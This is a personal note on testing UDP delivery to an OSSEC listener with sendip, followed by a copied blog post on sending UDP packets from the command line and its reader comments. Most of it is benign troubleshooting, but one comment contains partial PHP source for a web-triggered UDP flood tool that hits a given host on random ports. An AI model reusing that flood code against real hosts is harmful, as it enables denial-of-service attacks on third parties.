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it works. I mean how to send udp packet to defined port to defined server.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had installed centos 6.4 and install package.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-Uvh /media/sf_share/centos/sendip-2.5-2.el6.rf.x86_64.rpm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1:sendip                 ########################################### [100%]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udp to server 10.216.40.38 to udp port 1514 (and as I undestand, from port 5070).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sendip -p ipv4 -is 10.216.40.38 -p udp -us 5070 -ud 1514 -d "Hello" -v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Added 26 options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ipv4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udp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udp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ipv4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 packet data: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45 00 00 21   E..!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8B B1 00 00   ....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 11 CA 1E   ....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 CE 05 EA   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0D 5C 4E   ..\N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 65 6C 6C   Hell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6F   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33 bytes to 10.216.40.38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ipv4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udp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1514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0.0.0.0:1514                0.0.0.0:*                               2463/ossec-remoted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shared]#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port 1514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16:23:28.288649 IP 172.16.28.74.53292 &gt; 10.216.40.38.1514: UDP, length 5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captured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received by filter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from here.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http://pkgs.repoforge.org/sendip/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http://www.moythreads.com/wordpress/2012/03/15/sending-udp-packets-from-the-command-line/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Sending UDP packets from the command line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Filed under: linux — moy @ 00:34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Although is pretty easy to write a perl/python script to send UDP data, I wanted to be able to send a UDP message from the command line to test some code quickly. After 15 seconds of googling I found the awesome command “sendip”. After a minute of reading the man page I got what I needed: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sendip -p ipv4 -is 192.168.1.81 -p udp -us 5070 -ud 5060 -d "Hello" -v 192.168.1.81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should send a “Hello” message over udp to port 5060 using an ipv4 address.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the result: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Added 26 options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Initializing module ipv4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Initializing module udp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Finalizing module udp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Finalizing module ipv4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packet data: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45 00 00 21   E..!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34 E0 00 00   4...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FF 11 02 F9   ....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C0 A8 01 51   ...Q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C0 A8 01 51   ...Q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 CE 13 C4   ....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 0D 30 7D   ..0}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48 65 6C 6C   Hell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6F   o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 33 bytes to 192.168.1.81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Freeing module ipv4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Freeing module udp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pretty awesome that you can build about any protocol packet for quick testing using just bash …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Comments (16)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 Comments</w:t>
        <w:tab/>
        <w:t xml:space="preserve">»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Gracias por compartir, acabo de publicar tu enlace en Reddit: http://redd.it/qyh7d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mis_suscripciones — March 15, 2012 @ 18:37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really indeed awesome!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was looking at some ruby / perl code for creating such a tool…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still think I’m going to play with it – but this is just so awesome..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just keeps surprising me..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a lot for sharing!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M00kaw — March 15, 2012 @ 19:36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you tried “sipsak” for SIP testing?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Jose Ferney Franco — March 17, 2012 @ 13:43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 José,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Never used sipsak, whenever I need full SIP testing I use “sipp”. I see sipsak handy though for quick testing without bothering to write an XML scenario for sipp. Thanks for sharing!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Moy — March 18, 2012 @ 20:17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 Moy,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like socat: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e.g.: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“HELLO” | socat – UDP-DATAGRAM:192.168.0.255:5000,broadcast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Checkout some examples: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http://thekissinglink.blogspot.com/2010/01/socat-examples.html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Vlad — June 8, 2012 @ 15:57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Hey Vlad!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That’s a creative use of socat.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had only used it in the past to quickly send freeswitch ESL commands over TCP from bash, I should’ve thought udp support was there as well.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for sharing!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Moy — June 9, 2012 @ 17:38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u send that to a public ip like google server or something like that?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Vice — July 18, 2012 @ 15:37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 you can do that.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Don’t do evil stuff!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Moy — July 19, 2012 @ 12:39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it easier to use bash’s built in TCP/UDP handling capabilities?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“hello” &gt; /dev/tcp/192.168.2.101/58549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“hello” &gt; /dev/udp/192.168.2.101/58549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Peter — July 25, 2012 @ 11:23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definitely another option and looks easier. However, it is probably not as powerful.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Can you specify IPv6 somehow? perhaps implicit when using IPv6 address formatting?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How do you specify the source IP address and port?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Another difference is that if you’re using dash (Ubuntu now ships with it I believe), zsh, korn shell or others, that might not work.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Moy — July 25, 2012 @ 13:38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send to a ports range ?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Rain — October 5, 2012 @ 00:07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input{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background-color: #00FF00; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;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background-color: #00FF00; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;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background-color: black;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//UDP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if(isset($_GET['host'])&amp;&amp;isset($_GET['time'])){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$packets = 0;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ignore_user_abort(TRUE);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set_time_limit(0);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$exec_time = $_GET['time'];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$time = time();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//print "Started: ".time('d-m-y h:i:s')."”;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$max_time = $time+$exec_time;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$host = $_GET['host'];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for($i=0;$i $max_time){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$rand = rand(1,65000);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$fp = fsockopen(‘udp://’.$host, $rand, $errno, $errstr, 5);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if($fp){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fwrite($fp, $out);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fclose($fp);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“UDP FloodCompleted with $packets (” . round(($packets*65)/1024, 2) . ” MB) packets averaging “. round($packets/$exec_time, 2) . ” packets per second \n”;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‘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form is inoperational!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Host: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 (seconds):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‘;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}else{ echo ‘UDP Flood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form is inoperational!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Host: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 (seconds):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‘;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ss — October 8, 2012 @ 21:01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“SendIP” a third part tool or comes as port of windows?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RR — March 1, 2013 @ 01:53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an easy to way to send/receive TCP/UDP packets, you can just download this: http://packetsender.com/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Tim — December 18, 2013 @ 20:15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for this topic. found exactly what I want to troubleshot rsyslog remote udp message logging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Zied — March 28, 2014 @ 12:38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use the ubiquitous net cat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-n “foo” | nc -4u -w1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http://mikeberggren.com/post/53883822425/ncudp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Comment by Chris — April 15, 2014 @ 12:47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kgs.repoforge.org/sendip/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moythreads.com/wordpress/2012/03/15/sending-udp-packets-from-the-command-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